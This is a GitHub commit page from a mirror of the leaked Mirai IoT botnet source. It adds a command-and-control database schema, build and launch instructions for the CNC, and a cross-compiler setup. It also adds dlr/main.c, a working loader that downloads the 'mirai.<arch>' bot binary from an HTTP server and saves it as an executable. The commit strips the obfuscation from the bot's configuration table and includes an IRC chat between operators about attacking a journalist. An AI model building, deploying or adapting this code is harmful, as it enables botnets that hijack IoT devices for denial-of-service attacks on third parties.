mirror of
https://github.com/jgamblin/Mirai-Source-Code
synced 2024-06-14 01:06:50 +00:00
Merge c8381aa219
into 22e18df02e
This commit is contained in:
commit
5a83eec32b
41
Configuring_CNC_Database.txt
Normal file
41
Configuring_CNC_Database.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
DROP DATABASE IF EXISTS mirai;
|
||||
CREATE DATABASE mirai;
|
||||
USE mirai;
|
||||
|
||||
CREATE TABLE `history` (
|
||||
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
|
||||
`user_id` int(10) unsigned NOT NULL,
|
||||
`time_sent` int(10) unsigned NOT NULL,
|
||||
`duration` int(10) unsigned NOT NULL,
|
||||
`command` text NOT NULL,
|
||||
`max_bots` int(11) DEFAULT '-1',
|
||||
PRIMARY KEY (`id`),
|
||||
KEY `user_id` (`user_id`)
|
||||
);
|
||||
|
||||
CREATE TABLE `users` (
|
||||
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
|
||||
`username` varchar(32) NOT NULL,
|
||||
`password` varchar(32) NOT NULL,
|
||||
`duration_limit` int(10) unsigned DEFAULT NULL,
|
||||
`cooldown` int(10) unsigned NOT NULL,
|
||||
`wrc` int(10) unsigned DEFAULT NULL,
|
||||
`last_paid` int(10) unsigned NOT NULL,
|
||||
`max_bots` int(11) DEFAULT '-1',
|
||||
`admin` int(10) unsigned DEFAULT '0',
|
||||
`intvl` int(10) unsigned DEFAULT '30',
|
||||
`api_key` text,
|
||||
PRIMARY KEY (`id`),
|
||||
KEY `username` (`username`)
|
||||
);
|
||||
|
||||
CREATE TABLE `whitelist` (
|
||||
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
|
||||
`prefix` varchar(16) DEFAULT NULL,
|
||||
`netmask` tinyint(3) unsigned DEFAULT NULL,
|
||||
PRIMARY KEY (`id`),
|
||||
KEY `prefix` (`prefix`)
|
||||
);
|
||||
|
||||
INSERT INTO users (username, password, duration_limit, cooldown, wrc, last_paid, max_bots, admin, api_key)\
|
||||
VALUES ( 'user', 'password',100, 0, 0, 0, 100, 1, 'foobar');
|
42
README.md
Executable file → Normal file
42
README.md
Executable file → Normal file
|
@ -1,3 +1,45 @@
|
|||
# Mirai Botnet Client, Echo Loader and CNC source code
|
||||
|
||||
This is the source code released from [here](http://hackforums.net/showthread.php?tid=5420472) as discussed in this [Brian Krebs Post](https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
|
||||
|
||||
I found
|
||||
|
||||
mirai.src.zip from [VT](https://www.virustotal.com/en/file/68d01cd712da9c5f889ce774ae7ad41cd6fbc13c42864aa593b60c1f6a7cef63/analysis/)
|
||||
|
||||
loader.src.zip from [VT](https://www.virustotal.com/en/file/fffad2fbd1fa187a748f6d2009b942d4935878d2c062895cde53e71d125b735e/analysis/)
|
||||
|
||||
dlr.src.zip from [VT](https://www.virustotal.com/en/file/519d4e3f9bc80893838f94fd0365d587469f9468b4fa2ff0fb0c8f7e8fb99429/analysis/)
|
||||
|
||||
Maybe they are original files.
|
||||
|
||||
|
||||
|
||||
Configuring_CNC_Database.txt from [pastebin.com/86d0iL9g](http://pastebin.com/86d0iL9g)
|
||||
|
||||
Setting_Up_Cross_Compilers.sh from [pastebin.com/1rRCc3aD](http://pastebin.com/1rRCc3aD)
|
||||
|
||||
Felicitychou
|
||||
|
||||
Chuck:
|
||||
Merged Felicitychou's additions and setup Vagrant file.
|
||||
To setup build environment, you just need to "vagrant up"
|
||||
Also removed obfuscation of table.c, so no need to run "enc" tool anymore
|
||||
Have modified some shell scripts to install more cross compiler packages and remove errors
|
||||
modified build.sh to download go packages
|
||||
|
||||
|
||||
steps to setup build environment
|
||||
- git pull
|
||||
- vagrant up
|
||||
- vagrant ssh
|
||||
- cd /vagrant/mirai
|
||||
- ./build.sh
|
||||
|
||||
Steps to create database:
|
||||
`cat Configure_CNC_Database.txt | mysql -u root --password=password`
|
||||
|
||||
Start the CnC
|
||||
- make a prompt file in ./release
|
||||
- `cd ./release`
|
||||
- `sudo ./cnc`
|
||||
|
||||
|
|
68
Setting_Up_Cross_Compilers.sh
Executable file
68
Setting_Up_Cross_Compilers.sh
Executable file
|
@ -0,0 +1,68 @@
|
|||
#!/bin/bash
|
||||
# RUN ALL OF THESE AS A PRIVELEGED USER, SINCE WE ARE DOWNLOADING INTO /etc
|
||||
|
||||
apt-get install -y gcc golang electric-fence
|
||||
|
||||
if [ ! -d "/etc/xcompile" ]; then
|
||||
pushd .
|
||||
mkdir /etc/xcompile
|
||||
cd /etc/xcompile
|
||||
|
||||
echo "downloading cross compilers"
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
|
||||
wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
|
||||
|
||||
echo "unpacking cross compilers"
|
||||
tar -jxf cross-compiler-armv4l.tar.bz2
|
||||
tar -jxf cross-compiler-armv5l.tar.bz2
|
||||
tar -jxf cross-compiler-i586.tar.bz2
|
||||
tar -jxf cross-compiler-m68k.tar.bz2
|
||||
tar -jxf cross-compiler-mips.tar.bz2
|
||||
tar -jxf cross-compiler-mipsel.tar.bz2
|
||||
tar -jxf cross-compiler-powerpc.tar.bz2
|
||||
tar -jxf cross-compiler-sh4.tar.bz2
|
||||
tar -jxf cross-compiler-sparc.tar.bz2
|
||||
|
||||
echo "deleting cross compilers"
|
||||
rm *.tar.bz2
|
||||
mv cross-compiler-armv4l armv4l
|
||||
mv cross-compiler-armv5l armv5l
|
||||
mv cross-compiler-i586 i586
|
||||
mv cross-compiler-m68k m68k
|
||||
mv cross-compiler-mips mips
|
||||
mv cross-compiler-mipsel mipsel
|
||||
mv cross-compiler-powerpc powerpc
|
||||
mv cross-compiler-sh4 sh4
|
||||
mv cross-compiler-sparc sparc
|
||||
|
||||
popd
|
||||
fi
|
||||
|
||||
|
||||
# PUT THESE COMMANDS IN THE FILE ~/.bashrc
|
||||
|
||||
# Cross compiler toolchains
|
||||
echo 'adding compiler toolchains to $PATH'
|
||||
echo '
|
||||
export PATH=$PATH:/etc/xcompile/armv4l/bin
|
||||
export PATH=$PATH:/etc/xcompile/armv5l/bin
|
||||
export PATH=$PATH:/etc/xcompile/i586/bin
|
||||
export PATH=$PATH:/etc/xcompile/m68k/bin
|
||||
export PATH=$PATH:/etc/xcompile/mips/bin
|
||||
export PATH=$PATH:/etc/xcompile/mipsel/bin
|
||||
export PATH=$PATH:/etc/xcompile/powerpc/bin
|
||||
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
|
||||
export PATH=$PATH:/etc/xcompile/sh4/bin
|
||||
export PATH=$PATH:/etc/xcompile/sparc/bin
|
||||
|
||||
# Golang
|
||||
export PATH=$PATH:/usr/local/go/bin
|
||||
export GOPATH=$HOME/Documents/go
|
||||
' >> /etc/bash.bashrc
|
26
Vagrantfile
vendored
Normal file
26
Vagrantfile
vendored
Normal file
|
@ -0,0 +1,26 @@
|
|||
# -*- mode: ruby -*-
|
||||
# vi: set ft=ruby :
|
||||
|
||||
# This vagrant sets up build environment for mirai botnet
|
||||
Vagrant.configure("2") do |config|
|
||||
# The most common configuration options are documented and commented below.
|
||||
# For a complete reference, please see the online documentation at
|
||||
# https://docs.vagrantup.com.
|
||||
|
||||
# Every Vagrant development environment requires a box. You can search for
|
||||
# boxes at https://atlas.hashicorp.com/search.
|
||||
config.vm.box = "ubuntu/trusty64"
|
||||
|
||||
# Enable provisioning with a shell script. Additional provisioners such as
|
||||
# Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
|
||||
# documentation for more information about their specific syntax and use.
|
||||
config.vm.provision "shell", inline: <<-SHELL
|
||||
debconf-set-selections <<< 'mysql-server mysql-server/root_password password password'
|
||||
debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password password'
|
||||
apt-get update
|
||||
apt-get upgrade -y
|
||||
apt-get install -y mysql-server mysql-client golang gcc electric-fence git
|
||||
chmod +x /vagrant/Setting_Up_Cross_Compilers.sh
|
||||
/vagrant/Setting_Up_Cross_Compilers.sh
|
||||
SHELL
|
||||
end
|
BIN
dlr.src.zip
Normal file
BIN
dlr.src.zip
Normal file
Binary file not shown.
22
dlr/build.sh
Normal file
22
dlr/build.sh
Normal file
|
@ -0,0 +1,22 @@
|
|||
armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm
|
||||
armv6l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm7
|
||||
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86
|
||||
m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.m68k
|
||||
mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mips
|
||||
#mips64-gcc -Os -D BOT_ARCH=\"mps64\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mps64
|
||||
mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mpsl
|
||||
powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.ppc
|
||||
sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh4
|
||||
#sh2elf-gcc -Os -D BOT_ARCH=\"sh2el\" -D SH2EL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2el
|
||||
#sh2eb-gcc -Os -D BOT_ARCH=\"sh2eb\" -D SH2EB -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2eb
|
||||
sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.spc
|
||||
|
||||
armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm
|
||||
armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm7
|
||||
i686-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.x86
|
||||
m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.m68k
|
||||
mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mips
|
||||
mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mpsl
|
||||
powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.ppc
|
||||
sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.sh4
|
||||
sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.spc
|
274
dlr/main.c
Normal file
274
dlr/main.c
Normal file
|
@ -0,0 +1,274 @@
|
|||
#include <sys/types.h>
|
||||
//#include <bits/syscalls.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
|
||||
|
||||
#define EXEC_MSG "MIRAI\n"
|
||||
#define EXEC_MSG_LEN 6
|
||||
|
||||
#define DOWNLOAD_MSG "FIN\n"
|
||||
#define DOWNLOAD_MSG_LEN 4
|
||||
|
||||
#define STDIN 0
|
||||
#define STDOUT 1
|
||||
#define STDERR 2
|
||||
|
||||
#if BYTE_ORDER == BIG_ENDIAN
|
||||
#define HTONS(n) (n)
|
||||
#define HTONL(n) (n)
|
||||
#elif BYTE_ORDER == LITTLE_ENDIAN
|
||||
#define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8))
|
||||
#define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \
|
||||
((((unsigned long)(n) & 0xff00)) << 8) | \
|
||||
((((unsigned long)(n) & 0xff0000)) >> 8) | \
|
||||
((((unsigned long)(n) & 0xff000000)) >> 24))
|
||||
#else
|
||||
#error "Fix byteorder"
|
||||
#endif
|
||||
|
||||
#ifdef __ARM_EABI__
|
||||
#define SCN(n) ((n) & 0xfffff)
|
||||
#else
|
||||
#define SCN(n) (n)
|
||||
#endif
|
||||
|
||||
inline void run(void);
|
||||
int sstrlen(char *);
|
||||
unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char);
|
||||
|
||||
/* stdlib calls */
|
||||
int xsocket(int, int, int);
|
||||
int xwrite(int, void *, int);
|
||||
int xread(int, void *, int);
|
||||
int xconnect(int, struct sockaddr_in *, int);
|
||||
int xopen(char *, int, int);
|
||||
int xclose(int);
|
||||
void x__exit(int);
|
||||
|
||||
#define socket xsocket
|
||||
#define write xwrite
|
||||
#define read xread
|
||||
#define connect xconnect
|
||||
#define open xopen
|
||||
#define close xclose
|
||||
#define __exit x__exit
|
||||
|
||||
#ifdef DEBUG
|
||||
/*
|
||||
void xprintf(char *str)
|
||||
{
|
||||
write(1, str, sstrlen(str));
|
||||
}
|
||||
#define printf xprintf
|
||||
*/
|
||||
#endif
|
||||
|
||||
void __start(void)
|
||||
{
|
||||
#if defined(MIPS) || defined(MIPSEL)
|
||||
__asm(
|
||||
".set noreorder\n"
|
||||
"move $0, $31\n"
|
||||
"bal 10f\n"
|
||||
"nop\n"
|
||||
"10:\n.cpload $31\n"
|
||||
"move $31, $0\n"
|
||||
".set reorder\n"
|
||||
);
|
||||
#endif
|
||||
run();
|
||||
}
|
||||
|
||||
inline void run(void)
|
||||
{
|
||||
char recvbuf[128];
|
||||
struct sockaddr_in addr;
|
||||
int sfd, ffd, ret;
|
||||
unsigned int header_parser = 0;
|
||||
int arch_strlen = sstrlen(BOT_ARCH);
|
||||
|
||||
write(STDOUT, EXEC_MSG, EXEC_MSG_LEN);
|
||||
|
||||
addr.sin_family = AF_INET;
|
||||
addr.sin_port = HTONS(80);
|
||||
addr.sin_addr.s_addr = HTTP_SERVER;
|
||||
|
||||
ffd = open("dvrHelper", O_WRONLY | O_CREAT | O_TRUNC, 0777);
|
||||
|
||||
sfd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
|
||||
#ifdef DEBUG
|
||||
if (ffd == -1)
|
||||
printf("Failed to open file!\n");
|
||||
if (sfd == -1)
|
||||
printf("Failed to call socket()\n");
|
||||
#endif
|
||||
|
||||
if (sfd == -1 || ffd == -1)
|
||||
__exit(1);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Connecting to host...\n");
|
||||
#endif
|
||||
|
||||
if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0)
|
||||
{
|
||||
#ifdef DEBUG
|
||||
printf("Failed to connect to host.\n");
|
||||
#endif
|
||||
write(STDOUT, "NIF\n", 4);
|
||||
__exit(-ret);
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Connected to host\n");
|
||||
#endif
|
||||
|
||||
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
|
||||
{
|
||||
#ifdef DEBUG
|
||||
printf("Failed to send get request.\n");
|
||||
#endif
|
||||
|
||||
__exit(3);
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Started header parse...\n");
|
||||
#endif
|
||||
|
||||
while (header_parser != 0x0d0a0d0a)
|
||||
{
|
||||
char ch;
|
||||
int ret = read(sfd, &ch, 1);
|
||||
|
||||
if (ret != 1)
|
||||
__exit(4);
|
||||
header_parser = (header_parser << 8) | ch;
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Finished receiving HTTP header\n");
|
||||
#endif
|
||||
|
||||
while (1)
|
||||
{
|
||||
int ret = read(sfd, recvbuf, sizeof (recvbuf));
|
||||
|
||||
if (ret <= 0)
|
||||
break;
|
||||
write(ffd, recvbuf, ret);
|
||||
}
|
||||
|
||||
close(sfd);
|
||||
close(ffd);
|
||||
write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN);
|
||||
__exit(5);
|
||||
}
|
||||
|
||||
int sstrlen(char *str)
|
||||
{
|
||||
int c = 0;
|
||||
|
||||
while (*str++ != 0)
|
||||
c++;
|
||||
return c;
|
||||
}
|
||||
|
||||
unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four)
|
||||
{
|
||||
unsigned long ip = 0;
|
||||
|
||||
ip |= (one << 24);
|
||||
ip |= (two << 16);
|
||||
ip |= (three << 8);
|
||||
ip |= (four << 0);
|
||||
return HTONL(ip);
|
||||
}
|
||||
|
||||
int xsocket(int domain, int type, int protocol)
|
||||
{
|
||||
#if defined(__NR_socketcall)
|
||||
#ifdef DEBUG
|
||||
printf("socket using socketcall\n");
|
||||
#endif
|
||||
struct {
|
||||
int domain, type, protocol;
|
||||
} socketcall;
|
||||
socketcall.domain = domain;
|
||||
socketcall.type = type;
|
||||
socketcall.protocol = protocol;
|
||||
|
||||
// 1 == SYS_SOCKET
|
||||
int ret = syscall(SCN(SYS_socketcall), 1, &socketcall);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("socket got ret: %d\n", ret);
|
||||
#endif
|
||||
return ret;
|
||||
#else
|
||||
#ifdef DEBUG
|
||||
printf("socket using socket\n");
|
||||
#endif
|
||||
return syscall(SCN(SYS_socket), domain, type, protocol);
|
||||
#endif
|
||||
}
|
||||
|
||||
int xread(int fd, void *buf, int len)
|
||||
{
|
||||
return syscall(SCN(SYS_read), fd, buf, len);
|
||||
}
|
||||
|
||||
int xwrite(int fd, void *buf, int len)
|
||||
{
|
||||
return syscall(SCN(SYS_write), fd, buf, len);
|
||||
}
|
||||
|
||||
int xconnect(int fd, struct sockaddr_in *addr, int len)
|
||||
{
|
||||
#if defined(__NR_socketcall)
|
||||
#ifdef DEBUG
|
||||
printf("connect using socketcall\n");
|
||||
#endif
|
||||
struct {
|
||||
int fd;
|
||||
struct sockaddr_in *addr;
|
||||
int len;
|
||||
} socketcall;
|
||||
socketcall.fd = fd;
|
||||
socketcall.addr = addr;
|
||||
socketcall.len = len;
|
||||
// 3 == SYS_CONNECT
|
||||
int ret = syscall(SCN(SYS_socketcall), 3, &socketcall);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("connect got ret: %d\n", ret);
|
||||
#endif
|
||||
|
||||
return ret;
|
||||
#else
|
||||
#ifdef DEBUG
|
||||
printf("connect using connect\n");
|
||||
#endif
|
||||
return syscall(SCN(SYS_connect), fd, addr, len);
|
||||
#endif
|
||||
}
|
||||
|
||||
int xopen(char *path, int flags, int other)
|
||||
{
|
||||
return syscall(SCN(SYS_open), path, flags, other);
|
||||
}
|
||||
|
||||
int xclose(int fd)
|
||||
{
|
||||
return syscall(SCN(SYS_close), fd);
|
||||
}
|
||||
|
||||
void x__exit(int code)
|
||||
{
|
||||
syscall(SCN(SYS_exit), code);
|
||||
}
|
10
dlr/release/.build
Normal file
10
dlr/release/.build
Normal file
|
@ -0,0 +1,10 @@
|
|||
<proxseas> wtf why would you hit krebs
|
||||
<tpres> Hm, why do you care? Just move C2 or something?
|
||||
<proxseas> no fuck, this is the shit you avoid. fuck off
|
||||
<proxseas> im kicking you off
|
||||
<tpres> Are you fucking me? you better be joking
|
||||
<proxseas> DO YOU HVE ANY IDEE
|
||||
<proxseas> * IDEA
|
||||
<proxseas> WHAT YOUVE DONE
|
||||
<tpres> look man i was just messing around its nbd
|
||||
<proxseas> YOU F UCKING IDIOT
|
BIN
dlr/release/dlr.arm
Normal file
BIN
dlr/release/dlr.arm
Normal file
Binary file not shown.
BIN
dlr/release/dlr.arm7
Normal file
BIN
dlr/release/dlr.arm7
Normal file
Binary file not shown.
BIN
dlr/release/dlr.m68k
Normal file
BIN
dlr/release/dlr.m68k
Normal file
Binary file not shown.
BIN
dlr/release/dlr.mips
Normal file
BIN
dlr/release/dlr.mips
Normal file
Binary file not shown.
BIN
dlr/release/dlr.mpsl
Normal file
BIN
dlr/release/dlr.mpsl
Normal file
Binary file not shown.
BIN
dlr/release/dlr.ppc
Normal file
BIN
dlr/release/dlr.ppc
Normal file
Binary file not shown.
BIN
dlr/release/dlr.sh4
Normal file
BIN
dlr/release/dlr.sh4
Normal file
Binary file not shown.
BIN
dlr/release/dlr.spc
Normal file
BIN
dlr/release/dlr.spc
Normal file
Binary file not shown.
BIN
loader.src.zip
Normal file
BIN
loader.src.zip
Normal file
Binary file not shown.
BIN
mirai.src.zip
Normal file
BIN
mirai.src.zip
Normal file
Binary file not shown.
|
@ -15,64 +15,64 @@ struct table_value table[TABLE_MAX_KEYS];
|
|||
|
||||
void table_init(void)
|
||||
{
|
||||
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
|
||||
add_entry(TABLE_CNC_PORT, "\x22\x35", 2); // 23
|
||||
// removeed obfuscation
|
||||
// use the folowing bash magic to create domain or other things for this hexadecimal escaped nonesense
|
||||
//
|
||||
// $echo example.com | hexdump -e '1/1 "\\\x"' -e '1/1 "%.2x"'
|
||||
// \x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0a
|
||||
// remember to add null byte on end
|
||||
|
||||
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
|
||||
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2); // 48101
|
||||
add_entry(TABLE_CNC_DOMAIN, "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x00", 12); //changed to example.com
|
||||
add_entry(TABLE_CNC_PORT, "\x00\x17", 2);
|
||||
add_entry(TABLE_SCAN_CB_DOMAIN, "\x72\x65\x70\x6f\x72\x74\x2e\x63\x68\x61\x6e\x67\x65\x6d\x65\x2e\x63\x6f\x6d\x00", 20);
|
||||
add_entry(TABLE_SCAN_CB_PORT, "\xbb\xe5", 2);
|
||||
add_entry(TABLE_EXEC_SUCCESS, "\x6c\x69\x73\x74\x65\x6e\x69\x6e\x67\x20\x74\x75\x6e\x30\x00", 15);
|
||||
add_entry(TABLE_KILLER_SAFE, "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x6f\x75\x74\x75\x2e\x62\x65\x2f\x64\x51\x77\x34\x77\x39\x57\x67\x58\x63\x51\x00", 29);
|
||||
add_entry(TABLE_KILLER_PROC, "\x2f\x70\x72\x6f\x63\x2f\x00", 7);
|
||||
add_entry(TABLE_KILLER_EXE, "\x2f\x65\x78\x65\x00", 5);
|
||||
add_entry(TABLE_KILLER_DELETED, "\x20\x28\x64\x65\x6c\x65\x74\x65\x64\x29\x00", 11);
|
||||
add_entry(TABLE_KILLER_FD, "\x2f\x66\x64\x00", 4);
|
||||
add_entry(TABLE_KILLER_ANIME, "\x2e\x61\x6e\x69\x6d\x65\x00", 7);
|
||||
add_entry(TABLE_KILLER_STATUS, "\x2f\x73\x74\x61\x74\x75\x73\x00", 8);
|
||||
add_entry(TABLE_MEM_QBOT, "\x52\x45\x50\x4f\x52\x54\x20\x25\x73\x3a\x25\x73\x00", 13);
|
||||
add_entry(TABLE_MEM_QBOT2, "\x48\x54\x54\x50\x46\x4c\x4f\x4f\x44\x00", 10);
|
||||
add_entry(TABLE_MEM_QBOT3, "\x4c\x4f\x4c\x4e\x4f\x47\x54\x46\x4f\x00", 10);
|
||||
add_entry(TABLE_MEM_UPX, "\x5c\x78\x35\x38\x5c\x78\x34\x44\x5c\x78\x34\x45\x5c\x78\x34\x45\x5c\x78\x34\x33\x5c\x78\x35\x30\x5c\x78\x34\x36\x5c\x78\x32\x32\x00", 33);
|
||||
add_entry(TABLE_MEM_ZOLLARD, "\x7a\x6f\x6c\x6c\x61\x72\x64\x00", 8);
|
||||
add_entry(TABLE_MEM_REMAITEN, "\x47\x45\x54\x4c\x4f\x43\x41\x4c\x49\x50\x00", 11);
|
||||
add_entry(TABLE_SCAN_SHELL, "\x73\x68\x65\x6c\x6c\x00", 6);
|
||||
add_entry(TABLE_SCAN_ENABLE, "\x65\x6e\x61\x62\x6c\x65\x00", 7);
|
||||
add_entry(TABLE_SCAN_SYSTEM, "\x73\x79\x73\x74\x65\x6d\x00", 7);
|
||||
add_entry(TABLE_SCAN_SH, "\x73\x68\x00", 3);
|
||||
add_entry(TABLE_SCAN_QUERY, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x4d\x49\x52\x41\x49\x00", 19);
|
||||
add_entry(TABLE_SCAN_RESP, "\x4d\x49\x52\x41\x49\x3a\x20\x61\x70\x70\x6c\x65\x74\x20\x6e\x6f\x74\x20\x66\x6f\x75\x6e\x64\x00", 24);
|
||||
add_entry(TABLE_SCAN_NCORRECT, "\x6e\x63\x6f\x72\x72\x65\x63\x74\x00", 9);
|
||||
add_entry(TABLE_SCAN_PS, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x70\x73\x00", 16);
|
||||
add_entry(TABLE_SCAN_KILL_9, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x00", 22);
|
||||
add_entry(TABLE_ATK_VSE, "\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00", 21);
|
||||
add_entry(TABLE_ATK_RESOLVER, "\x2f\x65\x74\x63\x2f\x72\x65\x73\x6f\x6c\x76\x2e\x63\x6f\x6e\x66\x00", 17);
|
||||
add_entry(TABLE_ATK_NSERV, "\x6e\x61\x6d\x65\x73\x65\x72\x76\x65\x72\x20\x00", 12);
|
||||
add_entry(TABLE_ATK_KEEP_ALIVE, "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 23);
|
||||
